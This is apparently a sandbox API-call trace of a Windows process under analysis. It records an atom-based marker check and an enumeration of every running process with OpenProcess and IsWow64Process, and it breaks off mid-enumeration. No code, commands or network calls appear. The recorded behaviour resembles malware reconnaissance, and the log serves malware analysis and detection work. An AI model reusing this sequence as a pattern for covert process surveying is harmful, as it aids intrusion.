	[0074.026] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0074.026] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0074.026] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0074.026] GetLastError () returned 0x5
	[0074.026] GetLastError () returned 0x5
	[0074.026] GetLastError () returned 0x5
	[0074.026] GetLastError () returned 0x5
	[0074.026] GetLastError () returned 0x5
	[0074.026] GetLastError () returned 0x5
	[0074.026] GetLastError () returned 0x5
	[0074.026] GetLastError () returned 0x5
	[0074.026] GetLastError () returned 0x5
	[0074.026] GetLastError () returned 0x5
	[0074.026] GetLastError () returned 0x5
	[0074.026] GetLastError () returned 0x5
	[0074.026] GetLastError () returned 0x5
	[0074.026] GetLastError () returned 0x5
	[0074.026] GetLastError () returned 0x5
	[0074.026] GetLastError () returned 0x5
	[0074.026] GetLastError () returned 0x5
	[0074.026] GetLastError () returned 0x5
	[0074.026] GetLastError () returned 0x5
	[0074.026] GetLastError () returned 0x5
	[0074.026] GetLastError () returned 0x5
	[0074.027] GetLastError () returned 0x5
	[0074.027] GetLastError () returned 0x5
	[0074.027] GetLastError () returned 0x5
	[0074.027] GetLastError () returned 0x5
	[0074.027] GetLastError () returned 0x5
	[0074.027] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0074.027] GetLastError () returned 0x5
	[0074.027] GetLastError () returned 0x5
	[0074.027] GetLastError () returned 0x5
	[0074.027] GetLastError () returned 0x5
	[0074.027] GetLastError () returned 0x5
	[0074.027] GetLastError () returned 0x5
	[0074.027] GetLastError () returned 0x5
	[0074.027] GetLastError () returned 0x5
	[0074.027] GetLastError () returned 0x5
	[0074.027] GetLastError () returned 0x5
	[0074.027] GetLastError () returned 0x5
	[0074.027] GetLastError () returned 0x5
	[0074.027] GetLastError () returned 0x5
	[0074.027] GetLastError () returned 0x5
	[0074.027] GetLastError () returned 0x5
	[0074.027] GetLastError () returned 0x5
	[0074.027] GetLastError () returned 0x5
	[0074.027] GetLastError () returned 0x5
	[0074.027] GetLastError () returned 0x5
	[0074.027] GetLastError () returned 0x5
	[0074.027] GetLastError () returned 0x5
	[0074.027] GetLastError () returned 0x5
	[0074.027] GetLastError () returned 0x5
	[0074.027] GetLastError () returned 0x5
	[0074.027] GetLastError () returned 0x5
	[0074.027] GetLastError () returned 0x5
	[0074.027] GetLastError () returned 0x5
	[0074.027] GetLastError () returned 0x5
	[0074.027] GetLastError () returned 0x5
	[0074.027] GetLastError () returned 0x5
	[0074.027] GetLastError () returned 0x5
	[0074.027] GetLastError () returned 0x5
	[0074.027] GetLastError () returned 0x5
	[0074.027] GetLastError () returned 0x5
	[0074.027] GetLastError () returned 0x5
	[0074.027] GetLastError () returned 0x5
	[0074.027] GetLastError () returned 0x5
	[0074.027] GetLastError () returned 0x5
	[0074.027] GetLastError () returned 0x5
	[0074.027] GetLastError () returned 0x5
	[0074.027] GetLastError () returned 0x5
	[0074.027] GetLastError () returned 0x5
	[0074.027] GetLastError () returned 0x5
	[0074.027] GetLastError () returned 0x5
	[0074.027] GetLastError () returned 0x5
	[0074.027] GetLastError () returned 0x5
	[0074.027] GetLastError () returned 0x5
	[0074.028] GetLastError () returned 0x5
	[0074.028] GetLastError () returned 0x5
	[0074.028] GetLastError () returned 0x5
	[0074.028] GetLastError () returned 0x5
	[0074.028] GetLastError () returned 0x5
	[0074.028] GetLastError () returned 0x5
	[0074.028] GetLastError () returned 0x5
	[0074.028] GetLastError () returned 0x5
	[0074.028] GetLastError () returned 0x5
	[0074.028] GetLastError () returned 0x5
	[0074.028] GetLastError () returned 0x5
	[0074.028] GetLastError () returned 0x5
	[0074.028] GetLastError () returned 0x5
	[0074.028] GetLastError () returned 0x5
	[0074.028] GetLastError () returned 0x5
	[0074.028] GetLastError () returned 0x5
	[0074.028] GetLastError () returned 0x5
	[0074.028] GetLastError () returned 0x5
	[0074.028] GetLastError () returned 0x5
	[0074.028] GetLastError () returned 0x5
	[0074.028] GetLastError () returned 0x5
	[0074.028] GetLastError () returned 0x5
	[0074.028] GetLastError () returned 0x5
	[0074.028] GetLastError () returned 0x5
	[0074.028] GetLastError () returned 0x5
	[0074.028] GetLastError () returned 0x5
	[0074.028] GetLastError () returned 0x5
	[0074.028] GetLastError () returned 0x5
	[0074.028] GetLastError () returned 0x5
	[0074.028] GetLastError () returned 0x5
	[0074.028] GetLastError () returned 0x5
	[0074.028] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0074.028] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0074.028] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0074.028] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0074.029] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0074.029] CloseHandle (hObject=0x224) returned 1
	[0074.029] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0074.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x7721b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.029] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0074.029] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.029] CloseHandle (hObject=0x224) returned 1
	[0074.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72e6d0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0074.029] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0074.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.029] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0074.029] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.029] CloseHandle (hObject=0x224) returned 1
	[0074.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x772158, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0074.070] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16e08) returned 0xc0000004
	[0074.071] VirtualAlloc (lpAddress=0x0, dwSize=0x16f08, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0074.071] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16f08, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0074.072] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0074.072] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x7721a0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0074.072] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0074.072] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772188, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.072] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0074.072] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.072] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0074.072] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x7721d0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.073] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0074.073] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.073] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0074.073] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.073] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0074.073] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x772158, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.073] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0074.073] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.073] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0074.073] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.073] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0074.073] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dbc0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0074.073] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0074.073] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.074] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0074.074] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.074] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0074.074] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.074] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0074.074] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.074] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0074.074] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.074] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0074.074] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.074] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0074.074] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.074] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0074.074] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.075] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0074.075] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.075] CloseHandle (hObject=0x224) returned 1
	[0074.075] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x772200, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0074.075] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0074.075] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.075] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0074.075] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x7287f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0074.075] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0074.075] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.075] CloseHandle (hObject=0x224) returned 1
	[0074.075] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x7288f8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0074.075] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0074.075] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.075] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0074.075] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.075] CloseHandle (hObject=0x224) returned 1
	[0074.076] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772188, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.076] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0074.076] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.076] CloseHandle (hObject=0x224) returned 1
	[0074.076] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x772188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.076] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0074.076] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.076] CloseHandle (hObject=0x224) returned 1
	[0074.076] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772170, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.076] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0074.076] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.076] CloseHandle (hObject=0x224) returned 1
	[0074.076] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x7287f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0074.076] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0074.076] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.076] CloseHandle (hObject=0x224) returned 1
	[0074.076] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x772218, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.076] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0074.076] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.077] CloseHandle (hObject=0x224) returned 1
	[0074.077] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.077] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0074.077] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.077] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0074.077] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.077] CloseHandle (hObject=0x224) returned 1
	[0074.077] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x7721d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.077] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0074.077] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.077] CloseHandle (hObject=0x224) returned 1
	[0074.078] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.078] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0074.078] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.078] CloseHandle (hObject=0x224) returned 1
	[0074.078] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x7287f8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0074.078] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0074.078] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x7721b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.078] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0074.078] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.078] CloseHandle (hObject=0x224) returned 1
	[0074.078] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0074.078] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0074.078] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.078] CloseHandle (hObject=0x224) returned 1
	[0074.078] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dd70, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0074.078] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0074.078] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.078] CloseHandle (hObject=0x224) returned 1
	[0074.078] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x728858, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0074.079] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0074.079] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.079] CloseHandle (hObject=0x224) returned 1
	[0074.079] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72e6d0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0074.079] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0074.079] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.079] CloseHandle (hObject=0x224) returned 1
	[0074.079] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x728838, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0074.079] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0074.079] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.079] CloseHandle (hObject=0x224) returned 1
	[0074.079] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.079] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0074.079] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.079] CloseHandle (hObject=0x224) returned 1
	[0074.079] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.079] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0074.079] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.080] CloseHandle (hObject=0x224) returned 1
	[0074.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x7289f8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0074.080] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
